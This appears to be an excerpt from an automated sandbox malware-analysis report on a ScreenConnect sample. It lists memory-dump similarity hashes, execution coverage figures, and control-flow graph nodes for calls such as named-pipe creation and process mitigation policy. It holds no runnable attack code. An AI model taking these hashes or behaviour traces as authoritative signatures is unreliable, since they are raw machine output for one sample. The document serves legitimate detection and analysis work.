                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: M3
                                                                • API String ID: 0-3098042829
                                                                • Opcode ID: a4d96123b6269c7e9df15224f535020dfe23e239546f7b709695c9200e96814b
                                                                • Instruction ID: 9e29d8610212cbae294c41e6c2c7837145c4eed9baeb4f73df297350f9d1a0ec
                                                                • Opcode Fuzzy Hash: a4d96123b6269c7e9df15224f535020dfe23e239546f7b709695c9200e96814b
                                                                • Instruction Fuzzy Hash: 18519F7760DD894FEBD8EF1898B5AA177D1FFA9314B1401A9D44EDB286CE29F8028740
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `j3
                                                                • API String ID: 0-3289487541
                                                                • Opcode ID: fc5b467b88c27a980dac706305e9a88beffb1d1b32de7ccd07fe3e3551273e03
                                                                • Instruction ID: d25ac3405d00e9a04f67f7aaa6ddcab8ec62b238385a5e8c8c95b4b8c8db5366
                                                                • Opcode Fuzzy Hash: fc5b467b88c27a980dac706305e9a88beffb1d1b32de7ccd07fe3e3551273e03
                                                                • Instruction Fuzzy Hash: D1210323B0DE464FF795932884B4776B6D2EF8A310F0480B6D65DC72E2CD1CAC05A780
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc8003295d86f991fa6aa324914b2b66b350e8b79a1d12dbe7f6c8198db655d5
                                                                • Instruction ID: 4f3bfa64bf41f44ad32e3c0d43c4ef9b9c8879f8d5bc88c91207a25956f52aad
                                                                • Opcode Fuzzy Hash: bc8003295d86f991fa6aa324914b2b66b350e8b79a1d12dbe7f6c8198db655d5
                                                                • Instruction Fuzzy Hash: CF711271B18E0A8FEBA8EB58C4F1BA537D1FF59301F5040B8E58EC729ADD68E8419740
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 031c72b22d996dc885168cd83404c2fd45facd1c1c83c73b833fd4c0193da6e5
                                                                • Instruction ID: 427d7aa86235d68c058f3d8fbbfce76e6d3c7ba175aa635fb93bce73db475aa9
                                                                • Opcode Fuzzy Hash: 031c72b22d996dc885168cd83404c2fd45facd1c1c83c73b833fd4c0193da6e5
                                                                • Instruction Fuzzy Hash: FD514B73F0DD494FEB65EB68A8B11A93BE1FF96310F04017AD55CC3692DE6CA8028341
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2425520c215c363baf6bfe89543dd6e9a7076ec3fc2a7db20e7ae0889dc7ba69
                                                                • Instruction ID: 9004fe77dc7b3f442875d819a3f1c1086b8548f4bc6fd38db586e2d57c2826a7
                                                                • Opcode Fuzzy Hash: 2425520c215c363baf6bfe89543dd6e9a7076ec3fc2a7db20e7ae0889dc7ba69
                                                                • Instruction Fuzzy Hash: 12510562B1DE8A4FEB96AB3894B11A53BE0EF56214B4400BAD54CE71C3DE5DBC498341
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: df8d898f69d7e55a0e020649a41664f2166b639ddb9fe7db483445245659952c
                                                                • Instruction ID: 4ef3338cc6c6c4a4d4f92ca261b4fce56543689f8831f074a9e49bd5c983613e
                                                                • Opcode Fuzzy Hash: df8d898f69d7e55a0e020649a41664f2166b639ddb9fe7db483445245659952c
                                                                • Instruction Fuzzy Hash: C2516371618E4A8FDFC4DF28C8B4A6637E1FF69314B1405ADD419C7292CB79E842CB41
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0114bdc72b947aab09d843a849a3c17e094298aaf7e7a3013568211a81157a3d
                                                                • Instruction ID: 6dba3c8fe0e7da47d4a301b8dde44496226cb340ccc7d47cc873e5e6fcf741eb
                                                                • Opcode Fuzzy Hash: 0114bdc72b947aab09d843a849a3c17e094298aaf7e7a3013568211a81157a3d
                                                                • Instruction Fuzzy Hash: AB31077370CE090BEF99EA1C94A29F633D1EB51760B40027BE54EC318BDD19F8468685
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b834cfac28d9074e03614a39700a950e76ae7fad72bca9c37893c83513366f63
                                                                • Instruction ID: c40c712dac2ee900e6ddc0f06f9bb11e981c5a48aa89becef31ffdff37838bd3
                                                                • Opcode Fuzzy Hash: b834cfac28d9074e03614a39700a950e76ae7fad72bca9c37893c83513366f63
                                                                • Instruction Fuzzy Hash: 97418635748E1A8FDADCEF18C1A066173E2FB99304B6049A8C16DDB68AC635FC43DB40
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 62a00e83c63d1cda9b08dbeb34fcadcbb773265ed0be9fa82a2b512b86530008
                                                                • Instruction ID: 609bd49c9d43a527e6cfd6c3dfdd6921144569a8d3d563bad395133a5c3a52c4
                                                                • Opcode Fuzzy Hash: 62a00e83c63d1cda9b08dbeb34fcadcbb773265ed0be9fa82a2b512b86530008
                                                                • Instruction Fuzzy Hash: 98313862A0DAC11EE762A6384C716F67FA4DF43254F0841FBD48CD6093ED0C5E499351
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c507dbc4ab1b6bd86a60d1c827358e03b20c3526fbb944135760d38596beae3c
                                                                • Instruction ID: 5ca6458d55baeebd23c06c66219c963e03a17cddee9d1996b8de690b68970d20
                                                                • Opcode Fuzzy Hash: c507dbc4ab1b6bd86a60d1c827358e03b20c3526fbb944135760d38596beae3c
                                                                • Instruction Fuzzy Hash: D221F762B1DE4A0FDB85EB7C84B51B577E1FF9622071482BBD44CD719BDE28E8068341
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c6f0caab465a52c825b8a05f2a419472f1f7b1768191cacc008bb759935dcb6f
                                                                • Instruction ID: 161d978f5714a4f6d603d10cf172f45c23510c9869e24709cc7ae4daca401e17
                                                                • Opcode Fuzzy Hash: c6f0caab465a52c825b8a05f2a419472f1f7b1768191cacc008bb759935dcb6f
                                                                • Instruction Fuzzy Hash: 0C11D6B2E0EE484FDF81DF645CB50A97FA0FF6A704F4540AAD158D36A2DB386801C742
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6603cb397cd8ac7b90cb158608c93ee05151a913cfcac83d14a40db0cc3a70d4
                                                                • Instruction ID: cccc834d0086e8b61b3b6917399b99b636d94fc013c156928f17a0342aa11f50
                                                                • Opcode Fuzzy Hash: 6603cb397cd8ac7b90cb158608c93ee05151a913cfcac83d14a40db0cc3a70d4
                                                                • Instruction Fuzzy Hash: C121F57391DFC64FE7926B7898704A63F70EF13714B0805B7C19ACA083EA1D6A59DB41
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dcb45d47adee2b59b62211b355a961821950a2bf4d21012f49f0adea312420ec
                                                                • Instruction ID: fbe868975e76cdab48a3620b082bbfcdf9aa904e7444b50d934a1d838946cf9e
                                                                • Opcode Fuzzy Hash: dcb45d47adee2b59b62211b355a961821950a2bf4d21012f49f0adea312420ec
                                                                • Instruction Fuzzy Hash: 7B119E26B0CE970AEB79922944B12756BE1AF47240F0981BAC54EC61D2DD2DDC86A201
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6d5669afeef71d2920aa03db99ab992e6456c1701265b16801c663a90acd8e36
                                                                • Instruction ID: 5ad3b369f62ddc1471b00ebe733ce06041d9b81523e9bc236ad00f051b1bc337
                                                                • Opcode Fuzzy Hash: 6d5669afeef71d2920aa03db99ab992e6456c1701265b16801c663a90acd8e36
                                                                • Instruction Fuzzy Hash: 79116D62B08D4A8FDB98EF18C4A1B65B7E1FF59304B1441A9C54DDB2C6CE29FC46CB80
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ce7304c3198d2633a671a365774ac6a33d3233c8bddbbe6a5d348044b4ab2b4a
                                                                • Instruction ID: 818a3734265e1d6fb4877d2637276e66da0669afcd54eb6cc6f29cb060b63b74
                                                                • Opcode Fuzzy Hash: ce7304c3198d2633a671a365774ac6a33d3233c8bddbbe6a5d348044b4ab2b4a
                                                                • Instruction Fuzzy Hash: 8F113D62B18D494FDB99EF18C4A1B65B7E1FF59304B1441A9C54DDB286CE29F805CB40
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4c79ec6da5ed7507997e39457721f415ea1ed5ca9c3cea9cb32a468475c3afc
                                                                • Instruction ID: e613dde48272bcec2c7a329c1f62bd65bcde7b985c057b426ea95fc6500f4d99
                                                                • Opcode Fuzzy Hash: a4c79ec6da5ed7507997e39457721f415ea1ed5ca9c3cea9cb32a468475c3afc
                                                                • Instruction Fuzzy Hash: 4D01F962B28D4A0FEF98FB7D44A45B667D1FFA8324710427AE41DD32DADD28E8428344
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f73897e9b5580f402e84bd5cdd562a43e6cbd13c567121162d78689a2814ed2
                                                                • Instruction ID: d8c751c99eeb8c18d8e4c28f3ce67fa5449a05483f535d15578f2b06ba4e87ea
                                                                • Opcode Fuzzy Hash: 6f73897e9b5580f402e84bd5cdd562a43e6cbd13c567121162d78689a2814ed2
                                                                • Instruction Fuzzy Hash: 15F0622144E6D21FD3469BB0C8656E47FF1AF47120B0E82FAD4C8CB4A3D50C5C8AC3A1
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2faf06c428656c83086a0c1435a453bfee2a831f9f885c595a5250c4dd8fffcb
                                                                • Instruction ID: 2299d6074bd062bbc799e45d2497bcb6ce34a33b3c6c748b3562fe6395a669a3
                                                                • Opcode Fuzzy Hash: 2faf06c428656c83086a0c1435a453bfee2a831f9f885c595a5250c4dd8fffcb
                                                                • Instruction Fuzzy Hash: E9E0922490DA861FD74AAB3488A94F13FB0AE5721178901DAD888CA067F91C89C5C392
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc6a592c7bb4a108f11160e9febe21a37ee38557ee418de0678e352faf1af6f2
                                                                • Instruction ID: b8a2751b2d85595270f6ecfc94815c6c74619282d6bc6f78c8216897ab8d05f0
                                                                • Opcode Fuzzy Hash: fc6a592c7bb4a108f11160e9febe21a37ee38557ee418de0678e352faf1af6f2
                                                                • Instruction Fuzzy Hash: 54F0923541969D9FCB42EB34E4558E67F70EF17314B0501CBE089CB023EB219A56CBC2
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9f5cd098a4ccab4ffbe74bca27f7419ddb994312461a42b3d292f4430c939015
                                                                • Instruction ID: 00b702488bdd05b4effe06711703daef75fa523d39aabc159a0fc297b0e3d0a2
                                                                • Opcode Fuzzy Hash: 9f5cd098a4ccab4ffbe74bca27f7419ddb994312461a42b3d292f4430c939015
                                                                • Instruction Fuzzy Hash: A8E08C16B4DE6702FB6C226678B53B560809F06351F0981BA950EC10C5DC5CDC81A151
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 43c29b485d44917ae7501498eb3c11dfd5b4fba01ae5af9432449e6e1904135a
                                                                • Instruction ID: 66074707da253e2deb5a426347de5f4d8165ad1cc5d8a69bc381634f16ba9d16
                                                                • Opcode Fuzzy Hash: 43c29b485d44917ae7501498eb3c11dfd5b4fba01ae5af9432449e6e1904135a
                                                                • Instruction Fuzzy Hash: FFC04C01B5892D0AA4E4B19D34653FD91C6D788661B8411F6E90CE228ADC095CC213C5
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fb101c9fd3868cae566ed89a81dace46fa499b41e0f96041f46b42c254d42f27
                                                                • Instruction ID: f2feb572683f4887e3f72c3ab5644ce3a9ed01a462e301dca3bfbf9a05b727b1
                                                                • Opcode Fuzzy Hash: fb101c9fd3868cae566ed89a81dace46fa499b41e0f96041f46b42c254d42f27
                                                                • Instruction Fuzzy Hash: 82C09B14F58D4A46F144FB24857117D51926F88240F544675D21DE11C6CE3D65017545
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 349938658ae71ee1100d9b186e105d477bd60a94e3429c739a1d4343092d63c5
                                                                • Instruction ID: d5dd1e4cd608e7f3d4d5a9a96ba1280304b05e2d6471b8a6beb9964c77e452f6
                                                                • Opcode Fuzzy Hash: 349938658ae71ee1100d9b186e105d477bd60a94e3429c739a1d4343092d63c5
                                                                • Instruction Fuzzy Hash: 07A00205F8DD1A45A0617614417117D40910F55640E2443B5D30DE129ACE5D6D427196

                                                                Execution Graph

                                                                Execution Coverage:13.8%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:16
                                                                Total number of Limit Nodes:1
                                                                execution_graph 15073 7ffd33e13642 15074 7ffd33e35880 CreateNamedPipeW 15073->15074 15076 7ffd33e359b3 15074->15076 15087 7ffd33e13662 15088 7ffd33e35df0 ConnectNamedPipe 15087->15088 15090 7ffd33e35ea2 15088->15090 15077 7ffd33e18014 15079 7ffd33e1801d 15077->15079 15078 7ffd33e18082 15079->15078 15080 7ffd33e180f6 SetProcessMitigationPolicy 15079->15080 15081 7ffd33e18152 15080->15081 15082 7ffd34128edc 15086 7ffd34128eeb 15082->15086 15083 7ffd34129029 GlobalMemoryStatusEx 15084 7ffd34129055 15083->15084 15085 7ffd34128f88 15086->15083 15086->15085

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 789 7ffd34128edc-7ffd34128ee9 790 7ffd34128f05-7ffd34128f25 789->790 791 7ffd34128eeb-7ffd34128efa 789->791 793 7ffd34128f7e 790->793 794 7ffd34128f27-7ffd34128f2a 790->794 796 7ffd34128f44-7ffd34128f57 791->796 797 7ffd34128efc-7ffd34128f04 791->797 795 7ffd34128f7f 793->795 798 7ffd34128fab-7ffd34128faf 794->798 799 7ffd34128f2c-7ffd34128f2e 794->799 801 7ffd34128f80 795->801 802 7ffd34128ffb 795->802 815 7ffd34128fc8-7ffd34128fc9 796->815 816 7ffd34128f59-7ffd34128f5d 796->816 797->790 811 7ffd34128fb0 798->811 803 7ffd34128f30 799->803 804 7ffd34128faa 799->804 807 7ffd34129001-7ffd34129027 801->807 808 7ffd34128f81 801->808 802->807 809 7ffd34128f73 803->809 810 7ffd34128f32-7ffd34128f34 803->810 804->798 817 7ffd34129029-7ffd34129053 GlobalMemoryStatusEx 807->817 818 7ffd34128fc3-7ffd34128fc7 808->818 819 7ffd34128f82-7ffd34128f86 808->819 813 7ffd34128fef-7ffd34128ff3 809->813 814 7ffd34128f75 809->814 810->811 812 7ffd34128f36 810->812 820 7ffd34128f38-7ffd34128f3a 812->820 821 7ffd34128f79 812->821 824 7ffd34128ff5-7ffd34128ffa 813->824 822 7ffd34128fb7-7ffd34128fb9 814->822 823 7ffd34128f76-7ffd34128f77 814->823 831 7ffd34128fe5-7ffd34128fe8 815->831 832 7ffd34128fcb-7ffd34128fdc 815->832 825 7ffd34128f5f-7ffd34128f61 816->825 826 7ffd34128fde 816->826 827 7ffd34129055 817->827 828 7ffd3412905b-7ffd34129082 817->828 818->815 829 7ffd34128f88-7ffd34128f8d 819->829 830 7ffd34128f6c-7ffd34128f6d 819->830 833 7ffd34128fb6 820->833 834 7ffd34128f3c 820->834 821->824 843 7ffd34128f7b-7ffd34128f7d 821->843 835 7ffd34128fbf 822->835 836 7ffd34128fbb-7ffd34128fbe 822->836 823->821 824->802 837 7ffd34128fdd 825->837 838 7ffd34128f63-7ffd34128f67 825->838 842 7ffd34128fdf 826->842 827->828 851 7ffd34128f95-7ffd34128fa9 829->851 840 7ffd34128f6e 830->840 841 7ffd34128fe9-7ffd34128fee 830->841 831->841 832->837 833->822 834->795 844 7ffd34128f3e-7ffd34128f41 834->844 845 7ffd34128fc0-7ffd34128fc1 835->845 846 7ffd34128fc2 835->846 836->835 837->826 847 7ffd34128fe3 838->847 848 7ffd34128f69 838->848 840->842 849 7ffd34128f6f-7ffd34128f71 840->849 841->813 842->817 850 7ffd34128fe0-7ffd34128fe1 842->850 843->793 844->845 852 7ffd34128f43 844->852 845->846 846->818 847->831 848->798 853 7ffd34128f6b 848->853 849->809 850->847 851->804 852->796 853->830
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2262320168.00007FFD34120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34120000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd34120000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb59ab92eda26dd2113ce050333c22da5c02f74385f3b9a11aca2428e15a3623
                                                                • Instruction ID: 50f0b16e25c1f9d8694980eaedb33c43e3cca70f5759007c1c7530b08d8750ad
                                                                • Opcode Fuzzy Hash: bb59ab92eda26dd2113ce050333c22da5c02f74385f3b9a11aca2428e15a3623
                                                                • Instruction Fuzzy Hash: B0712932E0CA4E4FE764DB5888656F97BE1FF57360F04027AD14DC7592DEAC680A8781

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2256344883.00007FFD33E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd33e10000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0
                                                                • Opcode ID: 681651c723ae9bce24e9a1379e14f5a547ea409b59a0c94a69930feabe98b78d
                                                                • Instruction ID: e8c0eeb60d23deec4803567014316a231412dcd47376fb592b96d53167d25e24
                                                                • Opcode Fuzzy Hash: 681651c723ae9bce24e9a1379e14f5a547ea409b59a0c94a69930feabe98b78d
                                                                • Instruction Fuzzy Hash: E0514831D0CB494FEB24AFA8984A5E97BE0EF55311F04027FE089D3192DE68A846C791

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1368 7ffd33e13642-7ffd33e358ea 1371 7ffd33e358f4-7ffd33e359b1 CreateNamedPipeW 1368->1371 1372 7ffd33e358ec-7ffd33e358f1 1368->1372 1374 7ffd33e359b3 1371->1374 1375 7ffd33e359b9-7ffd33e359ec 1371->1375 1372->1371 1374->1375
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2256344883.00007FFD33E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd33e10000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateNamedPipe
                                                                • String ID:
                                                                • API String ID: 2489174969-0
                                                                • Opcode ID: 7c0fb6973b0c140e9852de0fc9fd0fdab436637816383b3e67a9a62694e5f79a
                                                                • Instruction ID: dd25f5ba2ae9d7fe188d063e271f319d99d3ceb077feae46caa28d2683478ef3
                                                                • Opcode Fuzzy Hash: 7c0fb6973b0c140e9852de0fc9fd0fdab436637816383b3e67a9a62694e5f79a
                                                                • Instruction Fuzzy Hash: 5C51807191CA1C8FDB68EF5C9845BE9B7E0FB59720F0442AEE04EE3251CB31A8418BC1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1457 7ffd33e13662-7ffd33e35ea0 ConnectNamedPipe 1461 7ffd33e35ea2 1457->1461 1462 7ffd33e35ea8-7ffd33e35ef0 call 7ffd33e35ef1 1457->1462 1461->1462
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2256344883.00007FFD33E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd33e10000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ConnectNamedPipe
                                                                • String ID:
                                                                • API String ID: 2191148154-0
                                                                • Opcode ID: d7af5024e9ef63f8ddfd752f52b1896d6f6eb41c358e658802eb356f3e678682
                                                                • Instruction ID: 4d3300c596b271e1b2e91f6dd62377b7c9dc4d81a46b27548c80487099a270c4
                                                                • Opcode Fuzzy Hash: d7af5024e9ef63f8ddfd752f52b1896d6f6eb41c358e658802eb356f3e678682
                                                                • Instruction Fuzzy Hash: 6F314170A08A1C8FDB58EF98D849BEDB7F1FB54311F00826AD04DE7255DB70A945CB81

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1466 7ffd33e13aa2-7ffd33e180ef 1468 7ffd33e180f6-7ffd33e18150 SetProcessMitigationPolicy 1466->1468 1469 7ffd33e18152 1468->1469 1470 7ffd33e18158-7ffd33e18187 1468->1470 1469->1470
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2256344883.00007FFD33E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd33e10000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0
                                                                • Opcode ID: 6ece3c238fd99ddf7c5322ead5f07fbd8ba3eb518c1229b875e041b66cde67e8
                                                                • Instruction ID: a1d502ea73e22c062cb84ccc15032b6abfd5480b783aba02f77d27a51f370446
                                                                • Opcode Fuzzy Hash: 6ece3c238fd99ddf7c5322ead5f07fbd8ba3eb518c1229b875e041b66cde67e8
                                                                • Instruction Fuzzy Hash: E321D731918B188FDB28AF9CD84A6F9B7E0EB55711F00422EE049D3251DB74B845CB91